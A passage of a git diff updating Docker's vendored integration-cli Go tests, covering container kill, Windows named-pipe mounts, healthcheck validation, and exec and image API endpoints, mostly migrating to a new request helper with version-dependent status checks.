+// Makes sure that when a container which has a custom stop signal + restart=always
+// gets killed (with SIGKILL) by the kill API, that the restart policy is cancelled.
+func (s *DockerSuite) TestContainerKillCustomStopSignal(c *check.C) {
+	id := strings.TrimSpace(runSleepingContainer(c, "--stop-signal=SIGTERM", "--restart=always"))
+	res, _, err := request.Post("/containers/" + id + "/kill")
+	c.Assert(err, checker.IsNil)
+	defer res.Body.Close()
+
+	b, err := ioutil.ReadAll(res.Body)
+	c.Assert(res.StatusCode, checker.Equals, http.StatusNoContent, check.Commentf(string(b)))
+	err = waitInspect(id, "{{.State.Running}} {{.State.Restarting}}", "false false", 30*time.Second)
+	c.Assert(err, checker.IsNil)
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_containers_windows_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_containers_windows_test.go
new file mode 100644
index 0000000000..c569574de5
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_api_containers_windows_test.go
@@ -0,0 +1,76 @@
+// +build windows
+
+package main
+
+import (
+	"context"
+	"fmt"
+	"io/ioutil"
+	"math/rand"
+	"strings"
+
+	winio "github.com/Microsoft/go-winio"
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/api/types/mount"
+	"github.com/go-check/check"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+)
+
+func (s *DockerSuite) TestContainersAPICreateMountsBindNamedPipe(c *check.C) {
+	testRequires(c, SameHostDaemon, DaemonIsWindowsAtLeastBuild(16299)) // Named pipe support was added in RS3
+
+	// Create a host pipe to map into the container
+	hostPipeName := fmt.Sprintf(`\\.\pipe\docker-cli-test-pipe-%x`, rand.Uint64())
+	pc := &winio.PipeConfig{
+		SecurityDescriptor: "D:P(A;;GA;;;AU)", // Allow all users access to the pipe
+	}
+	l, err := winio.ListenPipe(hostPipeName, pc)
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer l.Close()
+
+	// Asynchronously read data that the container writes to the mapped pipe.
+	var b []byte
+	ch := make(chan error)
+	go func() {
+		conn, err := l.Accept()
+		if err == nil {
+			b, err = ioutil.ReadAll(conn)
+			conn.Close()
+		}
+		ch <- err
+	}()
+
+	containerPipeName := `\\.\pipe\docker-cli-test-pipe`
+	text := "hello from a pipe"
+	cmd := fmt.Sprintf("echo %s > %s", text, containerPipeName)
+	name := "test-bind-npipe"
+
+	ctx := context.Background()
+	client := testEnv.APIClient()
+	_, err = client.ContainerCreate(ctx,
+		&container.Config{
+			Image: testEnv.PlatformDefaults.BaseImage,
+			Cmd:   []string{"cmd", "/c", cmd},
+		}, &container.HostConfig{
+			Mounts: []mount.Mount{
+				{
+					Type:   "npipe",
+					Source: hostPipeName,
+					Target: containerPipeName,
+				},
+			},
+		},
+		nil, name)
+	assert.NilError(c, err)
+
+	err = client.ContainerStart(ctx, name, types.ContainerStartOptions{})
+	assert.NilError(c, err)
+
+	err = <-ch
+	assert.NilError(c, err)
+	assert.Check(c, is.Equal(text, strings.TrimSpace(string(b))))
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_create_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_create_test.go
index 41011c3157..8c7fff477e 100644
--- a/vendor/github.com/docker/docker/integration-cli/docker_api_create_test.go
+++ b/vendor/github.com/docker/docker/integration-cli/docker_api_create_test.go
@@ -1,84 +1,136 @@
 package main
 
 import (
+	"fmt"
 	"net/http"
+	"time"
 
-	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/api/types/versions"
+	"github.com/docker/docker/integration-cli/checker"
+	"github.com/docker/docker/internal/test/request"
 	"github.com/go-check/check"
 )
 
-func (s *DockerSuite) TestAPICreateWithNotExistImage(c *check.C) {
-	name := "test"
+func (s *DockerSuite) TestAPICreateWithInvalidHealthcheckParams(c *check.C) {
+	// test invalid Interval in Healthcheck: less than 0s
+	name := "test1"
 	config := map[string]interface{}{
-		"Image":   "test456:v1",
-		"Volumes": map[string]struct{}{"/tmp": {}},
+		"Image": "busybox",
+		"Healthcheck": map[string]interface{}{
+			"Interval": -10 * time.Millisecond,
+			"Timeout":  time.Second,
+			"Retries":  int(1000),
+		},
 	}
 
-	status, body, err := sockRequest("POST", "/containers/create?name="+name, config)
+	res, body, err := request.Post("/containers/create?name="+name, request.JSONBody(config))
 	c.Assert(err, check.IsNil)
-	c.Assert(status, check.Equals, http.StatusNotFound)
-	expected := "No such image: test456:v1"
-	c.Assert(getErrorMessage(c, body), checker.Contains, expected)
-
-	config2 := map[string]interface{}{
-		"Image":   "test456",
-		"Volumes": map[string]struct{}{"/tmp": {}},
+	if versions.LessThan(testEnv.DaemonAPIVersion(), "1.32") {
+		c.Assert(res.StatusCode, check.Equals, http.StatusInternalServerError)
+	} else {
+		c.Assert(res.StatusCode, check.Equals, http.StatusBadRequest)
 	}
 
-	status, body, err = sockRequest("POST", "/containers/create?name="+name, config2)
-	c.Assert(err, check.IsNil)
-	c.Assert(status, check.Equals, http.StatusNotFound)
-	expected = "No such image: test456:latest"
-	c.Assert(getErrorMessage(c, body), checker.Equals, expected)
+	buf, err := request.ReadBody(body)
+	c.Assert(err, checker.IsNil)
 
-	config3 := map[string]interface{}{
-		"Image": "sha256:0cb40641836c461bc97c793971d84d758371ed682042457523e4ae701efeaaaa",
-	}
+	expected := fmt.Sprintf("Interval in Healthcheck cannot be less than %s", container.MinimumDuration)
+	c.Assert(getErrorMessage(c, buf), checker.Contains, expected)
 
-	status, body, err = sockRequest("POST", "/containers/create?name="+name, config3)
+	// test invalid Interval in Healthcheck: larger than 0s but less than 1ms
+	name = "test2"
+	config = map[string]interface{}{
+		"Image": "busybox",
+		"Healthcheck": map[string]interface{}{
+			"Interval": 500 * time.Microsecond,
+			"Timeout":  time.Second,
+			"Retries":  int(1000),
+		},
+	}
+	res, body, err = request.Post("/containers/create?name="+name, request.JSONBody(config))
 	c.Assert(err, check.IsNil)
-	c.Assert(status, check.Equals, http.StatusNotFound)
-	expected = "No such image: sha256:0cb40641836c461bc97c793971d84d758371ed682042457523e4ae701efeaaaa"
-	c.Assert(getErrorMessage(c, body), checker.Equals, expected)
 
-}
+	buf, err = request.ReadBody(body)
+	c.Assert(err, checker.IsNil)
 
-// Test for #25099
-func (s *DockerSuite) TestAPICreateEmptyEnv(c *check.C) {
-	name := "test1"
-	config := map[string]interface{}{
-		"Image": "busybox",
-		"Env":   []string{"", "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"},
-		"Cmd":   []string{"true"},
+	if versions.LessThan(testEnv.DaemonAPIVersion(), "1.32") {
+		c.Assert(res.StatusCode, check.Equals, http.StatusInternalServerError)
+	} else {
+		c.Assert(res.StatusCode, check.Equals, http.StatusBadRequest)
 	}
+	c.Assert(getErrorMessage(c, buf), checker.Contains, expected)
 
-	status, body, err := sockRequest("POST", "/containers/create?name="+name, config)
+	// test invalid Timeout in Healthcheck: less than 1ms
+	name = "test3"
+	config = map[string]interface{}{
+		"Image": "busybox",
+		"Healthcheck": map[string]interface{}{
+			"Interval": time.Second,
+			"Timeout":  -100 * time.Millisecond,
+			"Retries":  int(1000),
+		},
+	}
+	res, body, err = request.Post("/containers/create?name="+name, request.JSONBody(config))
 	c.Assert(err, check.IsNil)
-	c.Assert(status, check.Equals, http.StatusInternalServerError)
-	expected := "invalid environment variable:"
-	c.Assert(getErrorMessage(c, body), checker.Contains, expected)
+	if versions.LessThan(testEnv.DaemonAPIVersion(), "1.32") {
+		c.Assert(res.StatusCode, check.Equals, http.StatusInternalServerError)
+	} else {
+		c.Assert(res.StatusCode, check.Equals, http.StatusBadRequest)
+	}
 
-	name = "test2"
+	buf, err = request.ReadBody(body)
+	c.Assert(err, checker.IsNil)
+
+	expected = fmt.Sprintf("Timeout in Healthcheck cannot be less than %s", container.MinimumDuration)
+	c.Assert(getErrorMessage(c, buf), checker.Contains, expected)
+
+	// test invalid Retries in Healthcheck: less than 0
+	name = "test4"
 	config = map[string]interface{}{
 		"Image": "busybox",
-		"Env":   []string{"=", "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"},
-		"Cmd":   []string{"true"},
+		"Healthcheck": map[string]interface{}{
+			"Interval": time.Second,
+			"Timeout":  time.Second,
+			"Retries":  int(-10),
+		},
 	}
-	status, body, err = sockRequest("POST", "/containers/create?name="+name, config)
+	res, body, err = request.Post("/containers/create?name="+name, request.JSONBody(config))
 	c.Assert(err, check.IsNil)
-	c.Assert(status, check.Equals, http.StatusInternalServerError)
-	expected = "invalid environment variable: ="
-	c.Assert(getErrorMessage(c, body), checker.Contains, expected)
+	if versions.LessThan(testEnv.DaemonAPIVersion(), "1.32") {
+		c.Assert(res.StatusCode, check.Equals, http.StatusInternalServerError)
+	} else {
+		c.Assert(res.StatusCode, check.Equals, http.StatusBadRequest)
+	}
+
+	buf, err = request.ReadBody(body)
+	c.Assert(err, checker.IsNil)
+
+	expected = "Retries in Healthcheck cannot be negative"
+	c.Assert(getErrorMessage(c, buf), checker.Contains, expected)
 
+	// test invalid StartPeriod in Healthcheck: not 0 and less than 1ms
 	name = "test3"
 	config = map[string]interface{}{
 		"Image": "busybox",
-		"Env":   []string{"=foo", "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"},
-		"Cmd":   []string{"true"},
+		"Healthcheck": map[string]interface{}{
+			"Interval":    time.Second,
+			"Timeout":     time.Second,
+			"Retries":     int(1000),
+			"StartPeriod": 100 * time.Microsecond,
+		},
 	}
-	status, body, err = sockRequest("POST", "/containers/create?name="+name, config)
+	res, body, err = request.Post("/containers/create?name="+name, request.JSONBody(config))
 	c.Assert(err, check.IsNil)
-	c.Assert(status, check.Equals, http.StatusInternalServerError)
-	expected = "invalid environment variable: =foo"
-	c.Assert(getErrorMessage(c, body), checker.Contains, expected)
+	if versions.LessThan(testEnv.DaemonAPIVersion(), "1.32") {
+		c.Assert(res.StatusCode, check.Equals, http.StatusInternalServerError)
+	} else {
+		c.Assert(res.StatusCode, check.Equals, http.StatusBadRequest)
+	}
+
+	buf, err = request.ReadBody(body)
+	c.Assert(err, checker.IsNil)
+
+	expected = fmt.Sprintf("StartPeriod in Healthcheck cannot be less than %s", container.MinimumDuration)
+	c.Assert(getErrorMessage(c, buf), checker.Contains, expected)
 }
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_events_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_events_test.go
deleted file mode 100644
index 3891c87379..0000000000
--- a/vendor/github.com/docker/docker/integration-cli/docker_api_events_test.go
+++ /dev/null
@@ -1,73 +0,0 @@
-package main
-
-import (
-	"encoding/json"
-	"io"
-	"net/http"
-	"net/url"
-	"strconv"
-	"strings"
-	"time"
-
-	"github.com/docker/docker/pkg/integration/checker"
-	"github.com/docker/docker/pkg/jsonmessage"
-	"github.com/go-check/check"
-)
-
-func (s *DockerSuite) TestEventsAPIEmptyOutput(c *check.C) {
-	type apiResp struct {
-		resp *http.Response
-		err  error
-	}
-	chResp := make(chan *apiResp)
-	go func() {
-		resp, body, err := sockRequestRaw("GET", "/events", nil, "")
-		body.Close()
-		chResp <- &apiResp{resp, err}
-	}()
-
-	select {
-	case r := <-chResp:
-		c.Assert(r.err, checker.IsNil)
-		c.Assert(r.resp.StatusCode, checker.Equals, http.StatusOK)
-	case <-time.After(3 * time.Second):
-		c.Fatal("timeout waiting for events api to respond, should have responded immediately")
-	}
-}
-
-func (s *DockerSuite) TestEventsAPIBackwardsCompatible(c *check.C) {
-	since := daemonTime(c).Unix()
-	ts := strconv.FormatInt(since, 10)
-
-	out, _ := runSleepingContainer(c, "--name=foo", "-d")
-	containerID := strings.TrimSpace(out)
-	c.Assert(waitRun(containerID), checker.IsNil)
-
-	q := url.Values{}
-	q.Set("since", ts)
-
-	_, body, err := sockRequestRaw("GET", "/events?"+q.Encode(), nil, "")
-	c.Assert(err, checker.IsNil)
-	defer body.Close()
-
-	dec := json.NewDecoder(body)
-	var containerCreateEvent *jsonmessage.JSONMessage
-	for {
-		var event jsonmessage.JSONMessage
-		if err := dec.Decode(&event); err != nil {
-			if err == io.EOF {
-				break
-			}
-			c.Fatal(err)
-		}
-		if event.Status == "create" && event.ID == containerID {
-			containerCreateEvent = &event
-			break
-		}
-	}
-
-	c.Assert(containerCreateEvent, checker.Not(checker.IsNil))
-	c.Assert(containerCreateEvent.Status, checker.Equals, "create")
-	c.Assert(containerCreateEvent.ID, checker.Equals, containerID)
-	c.Assert(containerCreateEvent.From, checker.Equals, "busybox")
-}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_exec_resize_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_exec_resize_test.go
index cf4dded483..2db3d3e317 100644
--- a/vendor/github.com/docker/docker/integration-cli/docker_api_exec_resize_test.go
+++ b/vendor/github.com/docker/docker/integration-cli/docker_api_exec_resize_test.go
@@ -9,7 +9,9 @@ import (
 	"strings"
 	"sync"
 
-	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/docker/docker/api/types/versions"
+	"github.com/docker/docker/integration-cli/checker"
+	"github.com/docker/docker/internal/test/request"
 	"github.com/go-check/check"
 )
 
@@ -19,9 +21,13 @@ func (s *DockerSuite) TestExecResizeAPIHeightWidthNoInt(c *check.C) {
 	cleanedContainerID := strings.TrimSpace(out)
 
 	endpoint := "/exec/" + cleanedContainerID + "/resize?h=foo&w=bar"
-	status, _, err := sockRequest("POST", endpoint, nil)
+	res, _, err := request.Post(endpoint)
 	c.Assert(err, checker.IsNil)
-	c.Assert(status, checker.Equals, http.StatusInternalServerError)
+	if versions.LessThan(testEnv.DaemonAPIVersion(), "1.32") {
+		c.Assert(res.StatusCode, checker.Equals, http.StatusInternalServerError)
+	} else {
+		c.Assert(res.StatusCode, checker.Equals, http.StatusBadRequest)
+	}
 }
 
 // Part of #14845
@@ -35,16 +41,19 @@ func (s *DockerSuite) TestExecResizeImmediatelyAfterExecStart(c *check.C) {
 			"Cmd":         []string{"/bin/sh"},
 		}
 		uri := fmt.Sprintf("/containers/%s/exec", name)
-		status, body, err := sockRequest("POST", uri, data)
+		res, body, err := request.Post(uri, request.JSONBody(data))
 		if err != nil {
 			return err
 		}
-		if status != http.StatusCreated {
-			return fmt.Errorf("POST %s is expected to return %d, got %d", uri, http.StatusCreated, status)
+		if res.StatusCode != http.StatusCreated {
+			return fmt.Errorf("POST %s is expected to return %d, got %d", uri, http.StatusCreated, res.StatusCode)
 		}
 
+		buf, err := request.ReadBody(body)
+		c.Assert(err, checker.IsNil)
+
 		out := map[string]string{}
-		err = json.Unmarshal(body, &out)
+		err = json.Unmarshal(buf, &out)
 		if err != nil {
 			return fmt.Errorf("ExecCreate returned invalid json. Error: %q", err.Error())
 		}
@@ -55,23 +64,24 @@ func (s *DockerSuite) TestExecResizeImmediatelyAfterExecStart(c *check.C) {
 		}
 
 		payload := bytes.NewBufferString(`{"Tty":true}`)
-		conn, _, err := sockRequestHijack("POST", fmt.Sprintf("/exec/%s/start", execID), payload, "application/json")
+		conn, _, err := sockRequestHijack("POST", fmt.Sprintf("/exec/%s/start", execID), payload, "application/json", daemonHost())
 		if err != nil {
 			return fmt.Errorf("Failed to start the exec: %q", err.Error())
 		}
 		defer conn.Close()
 
-		_, rc, err := sockRequestRaw("POST", fmt.Sprintf("/exec/%s/resize?h=24&w=80", execID), nil, "text/plain")
-		// It's probably a panic of the daemon if io.ErrUnexpectedEOF is returned.
-		if err == io.ErrUnexpectedEOF {
-			return fmt.Errorf("The daemon might have crashed.")
+		_, rc, err := request.Post(fmt.Sprintf("/exec/%s/resize?h=24&w=80", execID), request.ContentType("text/plain"))
+		if err != nil {
+			// It's probably a panic of the daemon if io.ErrUnexpectedEOF is returned.
+			if err == io.ErrUnexpectedEOF {
+				return fmt.Errorf("The daemon might have crashed.")
+			}
+			// Other error happened, should be reported.
+			return fmt.Errorf("Fail to exec resize immediately after start. Error: %q", err.Error())
 		}
 
-		if err == nil {
-			rc.Close()
-		}
+		rc.Close()
 
-		// We only interested in the io.ErrUnexpectedEOF error, so we return nil otherwise.
 		return nil
 	}
 
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_exec_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_exec_test.go
index 716e9ac68f..118f9971a7 100644
--- a/vendor/github.com/docker/docker/integration-cli/docker_api_exec_test.go
+++ b/vendor/github.com/docker/docker/integration-cli/docker_api_exec_test.go
@@ -4,13 +4,20 @@ package main
 
 import (
 	"bytes"
+	"context"
 	"encoding/json"
 	"fmt"
+	"io/ioutil"
 	"net/http"
+	"os"
 	"strings"
 	"time"
 
-	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/versions"
+	"github.com/docker/docker/client"
+	"github.com/docker/docker/integration-cli/checker"
+	"github.com/docker/docker/internal/test/request"
 	"github.com/go-check/check"
 )
 
@@ -19,12 +26,18 @@ func (s *DockerSuite) TestExecAPICreateNoCmd(c *check.C) {
 	name := "exec_test"
 	dockerCmd(c, "run", "-d", "-t", "--name", name, "busybox", "/bin/sh")
 
-	status, body, err := sockRequest("POST", fmt.Sprintf("/containers/%s/exec", name), map[string]interface{}{"Cmd": nil})
+	res, body, err := request.Post(fmt.Sprintf("/containers/%s/exec", name), request.JSONBody(map[string]interface{}{"Cmd": nil}))
+	c.Assert(err, checker.IsNil)
+	if versions.LessThan(testEnv.DaemonAPIVersion(), "1.32") {
+		c.Assert(res.StatusCode, checker.Equals, http.StatusInternalServerError)
+	} else {
+		c.Assert(res.StatusCode, checker.Equals, http.StatusBadRequest)
+	}
+	b, err := request.ReadBody(body)
 	c.Assert(err, checker.IsNil)
-	c.Assert(status, checker.Equals, http.StatusInternalServerError)
 
 	comment := check.Commentf("Expected message when creating exec command with no Cmd specified")
-	c.Assert(getErrorMessage(c, body), checker.Contains, "No exec command specified", comment)
+	c.Assert(getErrorMessage(c, b), checker.Contains, "No exec command specified", comment)
 }
 
 func (s *DockerSuite) TestExecAPICreateNoValidContentType(c *check.C) {
@@ -36,11 +49,14 @@ func (s *DockerSuite) TestExecAPICreateNoValidContentType(c *check.C) {
 		c.Fatalf("Can not encode data to json %s", err)
 	}
 
-	res, body, err := sockRequestRaw("POST", fmt.Sprintf("/containers/%s/exec", name), jsonData, "text/plain")
+	res, body, err := request.Post(fmt.Sprintf("/containers/%s/exec", name), request.RawContent(ioutil.NopCloser(jsonData)), request.ContentType("test/plain"))
 	c.Assert(err, checker.IsNil)
-	c.Assert(res.StatusCode, checker.Equals, http.StatusInternalServerError)
-
-	b, err := readBody(body)
+	if versions.LessThan(testEnv.DaemonAPIVersion(), "1.32") {
+		c.Assert(res.StatusCode, checker.Equals, http.StatusInternalServerError)
+	} else {
+		c.Assert(res.StatusCode, checker.Equals, http.StatusBadRequest)
+	}
+	b, err := request.ReadBody(body)
 	c.Assert(err, checker.IsNil)
 
 	comment := check.Commentf("Expected message when creating exec command with invalid Content-Type specified")
@@ -54,16 +70,22 @@ func (s *DockerSuite) TestExecAPICreateContainerPaused(c *check.C) {
 	dockerCmd(c, "run", "-d", "-t", "--name", name, "busybox", "/bin/sh")
 
 	dockerCmd(c, "pause", name)
-	status, body, err := sockRequest("POST", fmt.Sprintf("/containers/%s/exec", name), map[string]interface{}{"Cmd": []string{"true"}})
+
+	cli, err := client.NewEnvClient()
 	c.Assert(err, checker.IsNil)
-	c.Assert(status, checker.Equals, http.StatusConflict)
+	defer cli.Close()
+
+	config := types.ExecConfig{
+		Cmd: []string{"true"},
+	}
+	_, err = cli.ContainerExecCreate(context.Background(), name, config)
 
 	comment := check.Commentf("Expected message when creating exec command with Container %s is paused", name)
-	c.Assert(getErrorMessage(c, body), checker.Contains, "Container "+name+" is paused, unpause the container before exec", comment)
+	c.Assert(err.Error(), checker.Contains, "Container "+name+" is paused, unpause the container before exec", comment)
 }
 
 func (s *DockerSuite) TestExecAPIStart(c *check.C) {
-	testRequires(c, DaemonIsLinux) // Uses pause/unpause but bits may be salvagable to Windows to Windows CI
+	testRequires(c, DaemonIsLinux) // Uses pause/unpause but bits may be salvageable to Windows to Windows CI
 	dockerCmd(c, "run", "-d", "--name", "test", "busybox", "top")
 
 	id := createExec(c, "test")
@@ -94,7 +116,7 @@ func (s *DockerSuite) TestExecAPIStartEnsureHeaders(c *check.C) {
 	dockerCmd(c, "run", "-d", "--name", "test", "busybox", "top")
 
 	id := createExec(c, "test")
-	resp, _, err := sockRequestRaw("POST", fmt.Sprintf("/exec/%s/start", id), strings.NewReader(`{"Detach": true}`), "application/json")
+	resp, _, err := request.Post(fmt.Sprintf("/exec/%s/start", id), request.RawString(`{"Detach": true}`), request.JSON)
 	c.Assert(err, checker.IsNil)
 	c.Assert(resp.Header.Get("Server"), checker.Not(checker.Equals), "")
 }
@@ -104,10 +126,10 @@ func (s *DockerSuite) TestExecAPIStartBackwardsCompatible(c *check.C) {
 	runSleepingContainer(c, "-d", "--name", "test")
 	id := createExec(c, "test")
 
-	resp, body, err := sockRequestRaw("POST", fmt.Sprintf("/v1.20/exec/%s/start", id), strings.NewReader(`{"Detach": true}`), "text/plain")
+	resp, body, err := request.Post(fmt.Sprintf("/v1.20/exec/%s/start", id), request.RawString(`{"Detach": true}`), request.ContentType("text/plain"))
 	c.Assert(err, checker.IsNil)
 
-	b, err := readBody(body)
+	b, err := request.ReadBody(body)
 	comment := check.Commentf("response body: %s", b)
 	c.Assert(err, checker.IsNil, comment)
 	c.Assert(resp.StatusCode, checker.Equals, http.StatusOK, comment)
@@ -118,21 +140,7 @@ func (s *DockerSuite) TestExecAPIStartMultipleTimesError(c *check.C) {
 	runSleepingContainer(c, "-d", "--name", "test")
 	execID := createExec(c, "test")
 	startExec(c, execID, http.StatusOK)
-
-	timeout := time.After(60 * time.Second)
-	var execJSON struct{ Running bool }
-	for {
-		select {
-		case <-timeout:
-			c.Fatal("timeout waiting for exec to start")
-		default:
-		}
-
-		inspectExec(c, execID, &execJSON)
-		if !execJSON.Running {
-			break
-		}
-	}
+	waitForExec(c, execID)
 
 	startExec(c, execID, http.StatusConflict)
 }
@@ -141,36 +149,117 @@ func (s *DockerSuite) TestExecAPIStartMultipleTimesError(c *check.C) {
 func (s *DockerSuite) TestExecAPIStartWithDetach(c *check.C) {
 	name := "foo"
 	runSleepingContainer(c, "-d", "-t", "--name", name)
-	data := map[string]interface{}{
-		"cmd":         []string{"true"},
-		"AttachStdin": true,
+
+	config := types.ExecConfig{
+		Cmd:          []string{"true"},
+		AttachStderr: true,
 	}
-	_, b, err := sockRequest("POST", fmt.Sprintf("/containers/%s/exec", name), data)
-	c.Assert(err, checker.IsNil, check.Commentf(string(b)))
 
-	createResp := struct {
-		ID string `json:"Id"`
-	}{}
-	c.Assert(json.Unmarshal(b, &createResp), checker.IsNil, check.Commentf(string(b)))
+	cli, err := client.NewEnvClient()
+	c.Assert(err, checker.IsNil)
+	defer cli.Close()
 
-	_, body, err := sockRequestRaw("POST", fmt.Sprintf("/exec/%s/start", createResp.ID), strings.NewReader(`{"Detach": true}`), "application/json")
+	createResp, err := cli.ContainerExecCreate(context.Background(), name, config)
 	c.Assert(err, checker.IsNil)
 
-	b, err = readBody(body)
+	_, body, err := request.Post(fmt.Sprintf("/exec/%s/start", createResp.ID), request.RawString(`{"Detach": true}`), request.JSON)
+	c.Assert(err, checker.IsNil)
+
+	b, err := request.ReadBody(body)
 	comment := check.Commentf("response body: %s", b)
 	c.Assert(err, checker.IsNil, comment)
 
-	resp, _, err := sockRequestRaw("GET", "/_ping", nil, "")
+	resp, _, err := request.Get("/_ping")
 	c.Assert(err, checker.IsNil)
 	if resp.StatusCode != http.StatusOK {
 		c.Fatal("daemon is down, it should alive")
 	}
 }
 
+// #30311
+func (s *DockerSuite) TestExecAPIStartValidCommand(c *check.C) {
+	name := "exec_test"
+	dockerCmd(c, "run", "-d", "-t", "--name", name, "busybox", "/bin/sh")
+
+	id := createExecCmd(c, name, "true")
+	startExec(c, id, http.StatusOK)
+
+	waitForExec(c, id)
+
+	var inspectJSON struct{ ExecIDs []string }
+	inspectContainer(c, name, &inspectJSON)
+
+	c.Assert(inspectJSON.ExecIDs, checker.IsNil)
+}
+
+// #30311
+func (s *DockerSuite) TestExecAPIStartInvalidCommand(c *check.C) {
+	name := "exec_test"
+	dockerCmd(c, "run", "-d", "-t", "--name", name, "busybox", "/bin/sh")
+
+	id := createExecCmd(c, name, "invalid")
+	if versions.LessThan(testEnv.DaemonAPIVersion(), "1.32") {
+		startExec(c, id, http.StatusNotFound)
+	} else {
+		startExec(c, id, http.StatusBadRequest)
+	}
+	waitForExec(c, id)
+
+	var inspectJSON struct{ ExecIDs []string }
+	inspectContainer(c, name, &inspectJSON)
+
+	c.Assert(inspectJSON.ExecIDs, checker.IsNil)
+}
+
+func (s *DockerSuite) TestExecStateCleanup(c *check.C) {
+	testRequires(c, DaemonIsLinux, SameHostDaemon)
+
+	// This test checks accidental regressions. Not part of stable API.
+
+	name := "exec_cleanup"
+	cid, _ := dockerCmd(c, "run", "-d", "-t", "--name", name, "busybox", "/bin/sh")
+	cid = strings.TrimSpace(cid)
+
+	stateDir := "/var/run/docker/containerd/" + cid
+
+	checkReadDir := func(c *check.C) (interface{}, check.CommentInterface) {
+		fi, err := ioutil.ReadDir(stateDir)
+		c.Assert(err, checker.IsNil)
+		return len(fi), nil
+	}
+
+	fi, err := ioutil.ReadDir(stateDir)
+	c.Assert(err, checker.IsNil)
+	c.Assert(len(fi), checker.GreaterThan, 1)
+
+	id := createExecCmd(c, name, "ls")
+	startExec(c, id, http.StatusOK)
+	waitForExec(c, id)
+
+	waitAndAssert(c, 5*time.Second, checkReadDir, checker.Equals, len(fi))
+
+	id = createExecCmd(c, name, "invalid")
+	startExec(c, id, http.StatusBadRequest)
+	waitForExec(c, id)
+
+	waitAndAssert(c, 5*time.Second, checkReadDir, checker.Equals, len(fi))
+
+	dockerCmd(c, "stop", name)
+	_, err = os.Stat(stateDir)
+	c.Assert(err, checker.NotNil)
+	c.Assert(os.IsNotExist(err), checker.True)
+}
+
 func createExec(c *check.C, name string) string {
-	_, b, err := sockRequest("POST", fmt.Sprintf("/containers/%s/exec", name), map[string]interface{}{"Cmd": []string{"true"}})
-	c.Assert(err, checker.IsNil, check.Commentf(string(b)))
+	return createExecCmd(c, name, "true")
+}
 
+func createExecCmd(c *check.C, name string, cmd string) string {
+	_, reader, err := request.Post(fmt.Sprintf("/containers/%s/exec", name), request.JSONBody(map[string]interface{}{"Cmd": []string{cmd}}))
+	c.Assert(err, checker.IsNil)
+	b, err := ioutil.ReadAll(reader)
+	c.Assert(err, checker.IsNil)
+	defer reader.Close()
 	createResp := struct {
 		ID string `json:"Id"`
 	}{}
@@ -179,17 +268,43 @@ func createExec(c *check.C, name string) string {
 }
 
 func startExec(c *check.C, id string, code int) {
-	resp, body, err := sockRequestRaw("POST", fmt.Sprintf("/exec/%s/start", id), strings.NewReader(`{"Detach": true}`), "application/json")
+	resp, body, err := request.Post(fmt.Sprintf("/exec/%s/start", id), request.RawString(`{"Detach": true}`), request.JSON)
 	c.Assert(err, checker.IsNil)
 
-	b, err := readBody(body)
+	b, err := request.ReadBody(body)
 	comment := check.Commentf("response body: %s", b)
 	c.Assert(err, checker.IsNil, comment)
 	c.Assert(resp.StatusCode, checker.Equals, code, comment)
 }
 
 func inspectExec(c *check.C, id string, out interface{}) {
-	resp, body, err := sockRequestRaw("GET", fmt.Sprintf("/exec/%s/json", id), nil, "")
+	resp, body, err := request.Get(fmt.Sprintf("/exec/%s/json", id))
+	c.Assert(err, checker.IsNil)
+	defer body.Close()
+	c.Assert(resp.StatusCode, checker.Equals, http.StatusOK)
+	err = json.NewDecoder(body).Decode(out)
+	c.Assert(err, checker.IsNil)
+}
+
+func waitForExec(c *check.C, id string) {
+	timeout := time.After(60 * time.Second)
+	var execJSON struct{ Running bool }
+	for {
+		select {
+		case <-timeout:
+			c.Fatal("timeout waiting for exec to start")
+		default:
+		}
+
+		inspectExec(c, id, &execJSON)
+		if !execJSON.Running {
+			break
+		}
+	}
+}
+
+func inspectContainer(c *check.C, id string, out interface{}) {
+	resp, body, err := request.Get(fmt.Sprintf("/containers/%s/json", id))
 	c.Assert(err, checker.IsNil)
 	defer body.Close()
 	c.Assert(resp.StatusCode, checker.Equals, http.StatusOK)
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_images_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_images_test.go
index b7617eae25..da1c8c8f28 100644
--- a/vendor/github.com/docker/docker/integration-cli/docker_api_images_test.go
+++ b/vendor/github.com/docker/docker/integration-cli/docker_api_images_test.go
@@ -1,33 +1,40 @@
 package main
 
 import (
-	"encoding/json"
+	"context"
 	"net/http"
-	"net/url"
+	"net/http/httptest"
 	"strings"
 
 	"github.com/docker/docker/api/types"
-	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/docker/docker/api/types/filters"
+	"github.com/docker/docker/client"
+	"github.com/docker/docker/integration-cli/checker"
+	"github.com/docker/docker/integration-cli/cli"
+	"github.com/docker/docker/integration-cli/cli/build"
+	"github.com/docker/docker/internal/test/request"
 	"github.com/go-check/check"
 )
 
 func (s *DockerSuite) TestAPIImagesFilter(c *check.C) {
+	cli, err := client.NewEnvClient()
+	c.Assert(err, checker.IsNil)
+	defer cli.Close()
+
 	name := "utest:tag1"
 	name2 := "utest/docker:tag2"
 	name3 := "utest:5000/docker:tag3"
 	for _, n := range []string{name, name2, name3} {
 		dockerCmd(c, "tag", "busybox", n)
 	}
-	type image types.ImageSummary
